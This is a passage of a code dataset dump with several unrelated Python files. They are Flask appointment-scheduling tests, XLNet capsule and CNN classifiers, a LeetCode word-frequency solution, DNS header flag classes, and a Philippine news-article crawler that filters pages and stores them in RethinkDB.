self.assertEqual(resp.json['date'], date)\n\n def test_all_appointments_with_timezone(self):\n resp = self.client.get('/appointment/?timezone=%s' % self.timezone)\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], self.timezone)\n self.assertEqual(resp.json['date'], str(self.today))\n self.assertEqual(len(resp.json['apt_time_utc_seconds']),\n len(self.appointment_times))\n\n def test_appointment_ok(self):\n start_time1 = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n # date = \"2000-01-26\"\n hour = 3600\n timezone = 8.0\n apt1 = self.make_an_appointment(start_time1, start_time1 + 4*hour,\n timezone)\n db.session.add(apt1)\n db.session.commit()\n\n ok, message = appointment_ok(apt1)\n self.assertFalse(ok)\n\n apt2 = self.make_an_appointment(start_time1+hour, start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt2)\n self.assertFalse(ok)\n\n apt3 = self.make_an_appointment(start_time1, start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt3)\n self.assertFalse(ok)\n\n apt4 = self.make_an_appointment(start_time1+2*hour,\n start_time1 + 4*hour,\n timezone)\n ok, message = appointment_ok(apt4)\n self.assertFalse(ok)\n\n apt5 = self.make_an_appointment(start_time1+2*hour,\n start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt5)\n self.assertFalse(ok)\n\n apt6 = self.make_an_appointment(start_time1+4*hour,\n start_time1 + 8*hour,\n timezone)\n ok, message = appointment_ok(apt6)\n self.assertTrue(ok)\n\n def test_all_appointments_day_before_after(self):\n zero_time = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n hour = 3600\n timezone = 8.0\n date = \"2000-01-26\"\n apt_before = self.make_an_appointment(zero_time - hour, zero_time,\n timezone)\n apt_after = self.make_an_appointment(zero_time, zero_time + hour,\n timezone)\n db.session.add(apt_before)\n db.session.add(apt_after)\n db.session.commit()\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time - hour, zero_time],\n [zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 0], [0, 60]])\n timezone = 9.0\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time - hour, zero_time],\n [zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 60], [60, 120]])\n timezone = 7.0\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 0]])\n\n def test_all_appointments_a_whole_day(self):\n # Test cases where appointments last for a whole day long\n start_time = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n end_time = 948902400 # 1/27/2000 12:00:00 AM GMT+8\n timezone = 8.0\n day_seconds = 24 * 3600\n date = \"2000-01-26\"\n apt1 = self.make_an_appointment(start_time, end_time, timezone)\n db.session.add(apt1)\n db.session.commit()\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440]])\n\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone + 1)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone + 1)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0 + 60, 1440]])\n\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone - 3)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone - 3)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440 - 60*3]])\n\n # Create another appointment just after apt1\n apt2 = self.make_an_appointment(start_time + day_seconds,\n end_time + day_seconds,\n timezone)\n db.session.add(apt2)\n db.session.commit()\n for tz_delta in range(-12, 0):\n tz = timezone + tz_delta\n url = '/appointment/?date=%s&timezone=%s' % (date, tz)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time,\n start_time + day_seconds],\n [start_time + day_seconds,\n end_time + day_seconds]])\n self.assertEqual(resp.json['timezone'], tz)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440 + tz_delta*60],\n [1440 + tz_delta*60, 1440]])\n\n def test_post_create(self):\n data = self.make_an_appointment_dict(\"2011-02-03\", \"60\", \"120\")\n with self.client:\n resp = self.client.post('/appointment/create', data=data,\n follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertTrue(\"Thank\" in resp.data)\n\n # Ensure session contains something.\n self.assertEqual(session['name'], data['name'])\n self.assertEqual(session['email'], data['email'])\n\n def test_post_illegal_data(self):\n illegal_date = \"2011-02-033\"\n data = self.make_an_appointment_dict(illegal_date, \"60\", \"120\")\n resp = self.client.post('/appointment/create', data=data,\n follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_get_local_minutes(self):\n seconds1 = 1390665600 # 1/26/2014 12:00:00 AM GMT+8\n seconds2 = 1390752000 # 1/27/2014 12:00:00 AM GMT+8\n date_obj = date(2014, 1, 26)\n timezone = 8 # GMT+8\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 0)\n self.assertEqual(m2, 1440)\n\n timezone = 7 # GMT+7\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 0)\n self.assertEqual(m2, 1380)\n\n timezone = 9 # GMT+9\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 60)\n self.assertEqual(m2, 1440)\n","sub_path":"tests/test_appointment.py","file_name":"test_appointment.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597372899","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom src.module.utils.squash import squash\nfrom src.module.attention.bilinear_attention import BilinearAttention\nimport numpy as np\n\n\nclass XlnetEncodingNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, hidden_size, dropout):\n super(XlnetEncodingNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, hidden_size),\n nn.Dropout(dropout)\n )\n\n def forward(self, xlnet_token, xlnet_segment):\n # xlnet encoding\n encoder_layer = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)[0]\n batch_size, segment_len = xlnet_segment.size()\n max_segment_len = xlnet_segment.argmax(dim=-1, keepdim=True)\n batch_arrange = torch.arange(segment_len).unsqueeze(0).expand(batch_size, segment_len).to(xlnet_segment.device)\n segment_mask = batch_arrange <= max_segment_len\n sentence_mask = segment_mask & (1 - xlnet_segment).byte()\n sentence_lens = sentence_mask.long().sum(dim=1, keepdim=True)\n\n # sentence encode layer\n max_len = sentence_lens.max().item()\n sentence = encoder_layer[:, 0: max_len].contiguous()\n sentence_mask = sentence_mask[:, 0: max_len].contiguous()\n sentence = sentence.masked_fill(sentence_mask.unsqueeze(-1) == 0, 0)\n sentence = self.sentence_transform(sentence)\n\n return sentence\n\n\nclass XlnetCapsuleNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, capsule_size, dropout, num_categories):\n super(XlnetCapsuleNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.capsule_size = capsule_size\n self.aspect_transform = nn.Sequential(\n nn.Linear(xlnet_size, capsule_size),\n nn.Dropout(dropout)\n )\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, capsule_size),\n nn.Dropout(dropout)\n )\n self.norm_attention = BilinearAttention(capsule_size, capsule_size)\n self.guide_capsule = nn.Parameter(\n torch.Tensor(num_categories, capsule_size)\n )\n self.guide_weight = nn.Parameter(\n torch.Tensor(capsule_size, capsule_size)\n )\n self.scale = nn.Parameter(torch.tensor(5.0))\n self.capsule_projection = nn.Linear(xlnet_size, xlnet_size * num_categories)\n self.dropout = dropout\n self.num_categories = num_categories\n self._reset_parameters()\n\n def _reset_parameters(self):\n nn.init.xavier_uniform_(self.guide_capsule)\n nn.init.xavier_uniform_(self.guide_weight)\n\n def load_sentiment(self, path):\n sentiment = np.load(path)\n e1 = np.mean(sentiment)\n d1 = np.std(sentiment)\n e2 = 0\n d2 = np.sqrt(2.0 / (sentiment.shape[0] + sentiment.shape[1]))\n sentiment = (sentiment - e1) / d1 * d2 + e2\n self.guide_capsule.data.copy_(torch.tensor(sentiment))\n\n def forward(self, xlnet_token, xlnet_segment):\n # xlnet encoding\n encoder_layer = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)[0] # [b,l,dim]\n batch_size, segment_len = xlnet_segment.size()\n max_segment_len = xlnet_segment.argmax(dim=-1, keepdim=True)\n batch_arrange = torch.arange(segment_len).unsqueeze(0).expand(batch_size, segment_len).to(xlnet_segment.device)\n segment_mask = batch_arrange <= max_segment_len\n sentence_mask = segment_mask & (1 - xlnet_segment).byte()\n aspect_mask = xlnet_segment\n sentence_lens = sentence_mask.long().sum(dim=1, keepdim=True)\n # aspect average pooling\n aspect_lens = aspect_mask.long().sum(dim=1, keepdim=True)\n aspect = encoder_layer.masked_fill(aspect_mask.unsqueeze(-1) == 0, 0)\n aspect = aspect.sum(dim=1, keepdim=False) / aspect_lens.float()\n # sentence encode layer\n max_len = sentence_lens.max().item()\n sentence = encoder_layer[:, 0: max_len].contiguous()\n sentence_mask = sentence_mask[:, 0: max_len].contiguous()\n sentence = sentence.masked_fill(sentence_mask.unsqueeze(-1) == 0, 0)\n # primary capsule layer\n sentence = self.sentence_transform(sentence)\n primary_capsule = squash(sentence, dim=-1)\n aspect = self.aspect_transform(aspect)\n aspect_capsule = squash(aspect, dim=-1)\n # aspect aware normalization\n norm_weight = self.norm_attention.get_attention_weights(aspect_capsule, primary_capsule, sentence_mask)\n # capsule guided routing\n category_capsule = self._capsule_guided_routing(primary_capsule, norm_weight)\n category_capsule_norm = torch.sqrt(torch.sum(category_capsule * category_capsule, dim=-1, keepdim=False))\n return category_capsule_norm\n\n def _capsule_guided_routing(self, primary_capsule, norm_weight):\n guide_capsule = squash(self.guide_capsule)\n guide_matrix = primary_capsule.matmul(self.guide_weight).matmul(guide_capsule.transpose(0, 1))\n guide_matrix = F.softmax(guide_matrix, dim=-1)\n guide_matrix = guide_matrix * norm_weight.unsqueeze(-1) * self.scale # (batch_size, time_step, num_categories)\n category_capsule = guide_matrix.transpose(1, 2).matmul(primary_capsule)\n category_capsule = F.dropout(category_capsule, p=self.dropout, training=self.training)\n category_capsule = squash(category_capsule)\n return category_capsule\n\n\nclass XlnetCNNNetwork(nn.Module):\n def __init__(self, xlnet, xlnet_size, dropout, cnn_size, filter_size, filter_nums, num_categories):\n super(XlnetCNNNetwork, self).__init__()\n self.xlnet = XlnetEncodingNetwork(xlnet, xlnet_size, cnn_size, dropout)\n self.dropout = dropout\n self.num_categories = num_categories\n self.cnn_size = cnn_size\n self.filter_size = filter_size\n self.filter_nums = filter_nums\n self.cnnDrop = nn.Dropout(0.5)\n self.convs = nn.ModuleList([\n nn.Sequential(\n nn.Conv1d(self.cnn_size, self.filter_nums, kernel_size=k),\n # nn.BatchNorm1d(num_features=feature_size),\n nn.ReLU(),\n ) for k in self.filter_size])\n self.linear = nn.Linear(self.filter_nums * len(self.filter_size), self.num_categories, bias=False)\n\n @staticmethod\n def pooling(conv, x):\n x = conv(x)\n x = F.max_pool1d(x, kernel_size=x.size(-1)).squeeze(-1)\n return x\n\n def forward(self, xlnet_token, xlnet_segment):\n xlnetout = self.xlnet(xlnet_token, xlnet_segment) # [b,l,dim]\n xlnetout = xlnetout.transpose(1, 2)\n out = [conv(xlnetout) for conv in self.convs]\n out = [F.max_pool1d(o, kernel_size=o.size(-1)).squeeze(-1) for o in out] # [B,D,L] -> [B,O,L]*len -> [B,O,1]*len -> [B,O]*len\n out = torch.cat(out, -1) # [B, len(k)*O]\n # out = self.cnnDrop(out)\n out = self.linear(out)\n # out = torch.softmax(out, -1)\n return out\n\n\nclass XlnetFcNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, dropout, hidden_size, num_categories):\n super(XlnetFcNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.hidden_size = hidden_size\n self.num_categories = num_categories\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, hidden_size),\n nn.Dropout(dropout)\n )\n self.linear = nn.Linear(self.hidden_size, self.num_categories, bias=False)\n # 0.首先写出一个test xml版本 1.怎么变成last_hidden_size 2.token type ids 0/1/2 3.attention mask\n def forward(self, xlnet_token, xlnet_segment):\n output = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)\n out = self.sentence_transform(output[0][:, -1])\n out = self.linear(out)\n # out = torch.softmax(out, -1)\n return out\n","sub_path":"src/aspect_category_model/xlnet_all.py","file_name":"xlnet_all.py","file_ext":"py","file_size_in_byte":8049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"625634186","text":"from typing import List\nfrom collections import Counter\nclass Solution:\n def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n ban = set(banned)\n freq = Counter()\n word, n = \"\", len(paragraph)\n for i in range(n + 1):\n if i < n and paragraph[i].isalpha():\n word += paragraph[i].lower()\n elif word:\n if word not in ban:\n freq[word] += 1\n word = \"\"\n maxFreq = max(freq.values())\n return next(word for word, f in freq.items() if f == maxFreq)\n\nx = Solution()\nprint(x.mostCommonWord(\"a, a, a, a, b,b,b,c, c\",[\"a\"]))\n\n#因为有用标点符号分隔的有用空格分隔的所以这个方法不太行\n\nclass Solution1:\n def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n for i in ['!','?',\"'\",',',\";\",\".\"]:\n paragraph = paragraph.replace(i,'')\n paragraph=paragraph.lower()\n dic = Counter(paragraph.split(' '))\n banlist = set(banned)\n max = 0\n maxkey=''\n for (key,value) in dic.items():\n if value>max and key not in banlist:\n maxkey=key\n max = value\n return maxkey","sub_path":"819. 最常见的单词/819. 最常见的单词.py","file_name":"819. 最常见的单词.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198629864","text":"import struct\n\n\nclass Flags():\n def __init__(self, data):\n self.data = bin(data)[2:].zfill(16)\n self.qr = 0\n self.opcode = 0\n self.authoritative_answer = 0\n self.truncated = 0\n self.recursion_desired = 0\n self.recursion_available = 0\n self.zero = 0\n self.rcode = 0\n\n def parse(self):\n self.qr = self.data[0]\n self.opcode = self.data[1:5]\n self.authoritative_answer = self.data[5]\n self.truncated = self.data[6]\n self.recursion_desired = self.data[7]\n self.recursion_available = self.data[8]\n self.zero = self.data[9:12]\n self.rcode = self.data[12:16]\n\n\nclass CollectFlags():\n def __init__(self, qr=0,opcode=0, aa=1, tc=0, rd=1, ra=1, rcode=0):\n self.result = ''\n self.result += str(qr) + 4 * str(opcode) + str(aa) + str(tc) + str(rd) + str(ra) + '000' + 4 * str(rcode)\n\n\n def get_bytes(self):\n return int(self.result, 2)\n\n","sub_path":"dnspackage/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93066836","text":"# start CoreNLP server\n# java -mx4g -cp \"*\" --add-modules java.xml.bind edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 20000 -annotators tokenize,ssplit,pos,lemma,ner,parse,sentiment -ssplit.eolonly\n# for deployment\n# pm2 start java --crawlerName=\"corenlp\" --cwd=\"/usr/bin/\" -x -- -mx4g -cp \"/home/vnc/corenlp/*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 20000 -annotators tokenize,ssplit,pos,lemma,ner,parse,sentiment -ssplit.eolonly -quiet\n# hack method to backup db on server\n# rethinkdb dump -c localhost:28015\n# tar zxvf ./rethinkdb_dump_2017-01-24T21:42:08.tar.gz\n# rm rethinkdb_dump_2017-01-24T21:21:47.tar.gz\n# mv rethinkdb_dump_2017-01-24T21:42:08 rethinkdb_dump_2017-01-24\n# tar -czvf rethinkdb_dump_2017-01-24.tar.gz rethinkdb_dump_2017-01-24\nimport newspaper\nfrom newspaper.nlp import summarize, keywords\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS\nimport json\nimport time\nfrom datetime import datetime\nimport re\nimport langdetect\nfrom random import randrange\nfrom urllib.parse import urldefrag, urlparse\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom dotenv import load_dotenv, find_dotenv\nfrom db import get_locations, get_provinces, get_one, insert_article, insert_log, get_uuid, get_rand_sources, get_sources, insert_item\nfrom utils import PH_TIMEZONE, search_locations, search_authors, get_publish_date, sleep, get_popularity, get_proxy, clean_url, categorize\n# from aylien import categorize, get_rate_limits\nfrom nlp import get_entities, summarize2\nfrom nlp.keywords import parse_topics\nfrom fake_useragent import UserAgent\nimport rethinkdb as r\nimport re\nfrom random import shuffle\nimport os\n\nload_dotenv(find_dotenv(), override=True)\n\nlocations = get_locations()\nprovinces = get_provinces()\n\n# news_sources = get_news_sources('timestamp')\n# shuffle(news_sources)\n# if not news_sources:\n# if PY_ENV == 'development':\n# print('EMPTY NEWS SOURCES')\n\nPY_ENV = os.environ.get('PY_ENV')\ncount = 0\nslp_time = 0\nlast_proxy = ''\n\nwhile True:\n news_sources = get_rand_sources()\n\n for news_source in news_sources:\n src_start_time = time.clock()\n src_art_count = 0\n\n url = news_source['url']\n source_id = news_source['id']\n\n config = newspaper.Config()\n config.follow_meta_refresh = True\n # config.memoize_articles = True if PY_ENV == 'production' else False\n config.memoize_articles = False\n\n proxy = get_proxy(last_proxy)\n last_proxy = proxy['http']\n\n if PY_ENV == 'production':\n # config.browser_user_agent = UserAgent().random\n config.browser_user_agent = 'Tutubot/1.0'\n # config.proxies = proxy\n\n try:\n source = newspaper.build(url, config=config)\n except Exception as e:\n if PY_ENV == 'development':\n print('(SOURCE ERROR) Source Skipped\\n')\n insert_log(source_id, 'sourceCrawl', 'error',\n float(time.clock() - src_start_time), {\n 'errorMessage': 'SOURCE ERROR',\n 'crawlerName': 'credible crawler'\n })\n continue\n\n error_articles = []\n prev_uuid = ''\n for article in source.articles:\n url_uuid = get_uuid(clean_url(article.url))\n article.id = url_uuid\n\n if prev_uuid == url_uuid:\n continue\n\n if get_one(url_uuid, 'errorArticles') or get_one(\n url_uuid, 'articles'):\n print('Skipped: ' + article.url)\n error_articles.append(article.id)\n\n prev_uuid = url_uuid\n\n source.articles = [\n a for a in source.articles if a.id not in error_articles\n ]\n\n if PY_ENV == 'development':\n print('Proxy: ' + proxy['http'])\n print('User-Agent: ' + config.browser_user_agent)\n print('\\nCrawler found new ' + str(len(source.articles)) +\n ' articles in http://' + source.domain + '\\n')\n\n insert_log(\n source_id, 'sourceCrawl', 'pending',\n float(time.clock() - src_start_time), {\n 'proxy': proxy['http'],\n 'userAgent': config.browser_user_agent,\n 'articlesCount': len(source.articles),\n 'crawlerName': 'credible crawler'\n })\n\n if not source.articles:\n if PY_ENV == 'development':\n print('(ZERO ARTICLES) Source Skipped\\n')\n slp_time = insert_log(source_id, 'sourceCrawl', 'error',\n float(time.clock() - src_start_time), {\n 'errorMessage': 'ZERO ARTICLES',\n 'crawlerName': 'credible crawler'\n })\n continue\n\n for article in source.articles:\n start_time = time.clock()\n sleep(slp_time)\n\n if PY_ENV == 'development':\n print(article.url)\n\n insert_log(source_id, 'articleCrawl', 'pending', float(slp_time), {\n 'articleUrl': article.url,\n 'crawlerName': 'credible crawler'\n })\n\n if re.search('/(category|gallery|photos?)/', article.url,\n re.IGNORECASE):\n if PY_ENV == 'development':\n print('\\n(NOT AN ARTICLE PAGE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'errorMessage': 'NOT AN ARTICLE PAGE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n try:\n article.download()\n article.parse()\n\n title = article.title\n title_split = article.title.split('|')\n\n if len(title_split) != 1:\n title = title_split[0].strip()\n\n pattern = re.compile(source.brand, re.IGNORECASE)\n body = pattern.sub('', article.text)\n categories = categorize(body)\n\n try:\n # if langdetect.detect(body) != 'en' or langdetect.detect(title) != 'en':\n if langdetect.detect(body) != 'en':\n if PY_ENV == 'development':\n print('\\n(NOT ENGLISH) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NOT ENGLISH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n except Exception:\n if PY_ENV == 'development':\n print('\\n(NOT ENGLISH) Skipped: ' + str(article.url) +\n '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NOT ENGLISH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if len(body.split()) < 100:\n if PY_ENV == 'development':\n print('\\n(SHORT CONTENT) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'SHORT CONTENT',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if source.brand in body:\n if PY_ENV == 'development':\n print('\\n(SOURCE IS IN BODY) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'SOURCE IS IN BODY',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if not body:\n if PY_ENV == 'development':\n print(\n '\\n(NO TEXT) Skipped: ' + str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NO TEXT',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n combined_body = body + ' ' + article.text + ' ' + title + ' ' + urlparse(\n article.url).path\n matched_locations = search_locations(combined_body, locations,\n provinces)\n\n nation_terms = r'\\WPH|Philippines?|Pilipinas|Filipino|Pilipino|Pinoy|Filipinos\\W'\n nation_pattern = re.compile(\n r'(\\W(' + nation_terms + ')$|^(' + nation_terms +\n r')\\W|\\W(' + nation_terms + r')\\W)', re.IGNORECASE)\n\n with open('./world-countries.json') as countries_file:\n countries = json.load(countries_file)\n for country in countries:\n if country in combined_body and not nation_pattern.search(\n combined_body):\n if PY_ENV == 'development':\n print('\\n(HAS OTHER COUNTRY BUT NO PH) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'HAS OTHER COUNTRY BUT NO PH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if not matched_locations:\n if not nation_pattern.search(combined_body):\n if PY_ENV == 'development':\n print('\\n(CAN\\'T FIND LOCATION) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'CAN\\'T FIND LOCATION',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n publish_date = get_publish_date(article.html)\n\n if publish_date.year < 2017 or publish_date.replace(\n tzinfo=None).date() > datetime.now().date():\n if PY_ENV == 'development':\n print('\\n(PUBLISH DATE NOT IN RANGE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'PUBLISH DATE NOT IN RANGE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if (not publish_date):\n if PY_ENV == 'development':\n print('\\n(CAN\\'T FIND PUBLISH DATE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'CAN\\'T FIND PUBLISH DATE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n publish_date = r.expr(publish_date)\n organizations, people, error = get_entities(body)\n\n if error:\n if PY_ENV == 'development':\n print('\\n(TEXT IS TOO LONG) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'TEXT IS TOO LONG',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n # summary_sentences = summarize2(body)\n # summary_sentences = [\n # s for s in summary_sentences if len(s.split(' ')) > 5\n # ]\n\n sentiment = SentimentIntensityAnalyzer().polarity_scores(body)\n # topics = parse_topics(body)\n popularity = get_popularity(article.url)\n joined_authors = ''.join(article.authors)\n\n if len(joined_authors) > 75:\n article.authors = [search_authors(article.html)]\n elif not article.authors:\n author = search_authors(article.html)\n if author:\n article.authors.append(author)\n\n article.top_image = '' if re.search(\n 'favicon', article.top_image) else article.top_image\n\n with open('../detector/tl_stopwords.txt', 'r') as f:\n TL_STOPWORDS = f.read().splitlines()\n\n STOP_WORDS = ENGLISH_STOP_WORDS.union(TL_STOPWORDS)\n cleaned_body = ' '.join([\n word for word in body.split()\n if word.lower() not in STOP_WORDS\n ])\n cleaned_title = ' '.join([\n word for word in title.split()\n if word.lower() not in STOP_WORDS\n ])\n text_keyws = list(keywords(cleaned_body).keys())\n title_keyws = list(keywords(cleaned_title).keys())\n keyws = list(set(title_keyws + text_keyws))\n\n summary = summarize(\n title=article.title, text=body, max_sents=3)\n\n # keywords = []\n # for key, value in article.keywords.items():\n # keywords.append({\n # 'word': key,\n # 'score': value\n # })\n\n # keywords = sorted(\n # keywords, key=lambda k: k['score'], reverse=True)\n # keywords = [keyword['word'] for keyword in keywords]\n\n new_article = {\n 'id': article.id,\n 'url': article.url,\n 'sourceId': news_source['id'],\n 'title': title,\n 'authors': article.authors,\n 'body': body,\n 'publishDate': publish_date,\n 'topImageUrl': article.top_image,\n # 'summary': summary_sentences,\n 'summary': summary,\n 'keywords': keyws,\n 'locations': matched_locations,\n 'categories': categories,\n 'sentiment': sentiment,\n 'organizations': organizations,\n 'people': people,\n 'popularity': popularity,\n # 'articleHtml': article.article_html,\n 'reactions': [],\n 'relatedArticles': []\n }\n\n insert_article(new_article)\n count += 1\n src_art_count += 1\n runtime = float(time.clock() - start_time)\n\n # rate_limits = get_rate_limits()\n # aylien_status = rate_limits[0]\n # aylien_status2 = rate_limits[1]\n # aylien_status3 = rate_limits[2]\n\n if PY_ENV == 'development':\n print(\n str(count) + '.) ' + str(title) + ' | ' +\n str(article.url))\n print('Locations: ' + ' | '.join([\n ml['location']['formattedAddress']\n for ml in matched_locations\n ]))\n # print('AYLIEN REMAINING CALL: [' +\n # str(aylien_status['remaining']) + ', ' +\n # str(aylien_status2['remaining']) + ', ' + str(\n # aylien_status3['remaining']) + '] -- ' + str(\n # '%.2f' % runtime + 's scraping runtime'))\n\n slp_time = insert_log(source_id, 'articleCrawl', 'success',\n float(time.clock() - start_time), {\n 'articleId': article.id,\n 'crawlerName': 'credible crawler'\n })\n\n except newspaper.ArticleException as e:\n if PY_ENV == 'development':\n print('\\n(ARTICLE ERROR) Article Skipped\\n')\n slp_time = insert_log(source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': url,\n 'crawlerName': 'credible crawler'\n })\n continue\n\n insert_log(source_id, 'sourceCrawl', 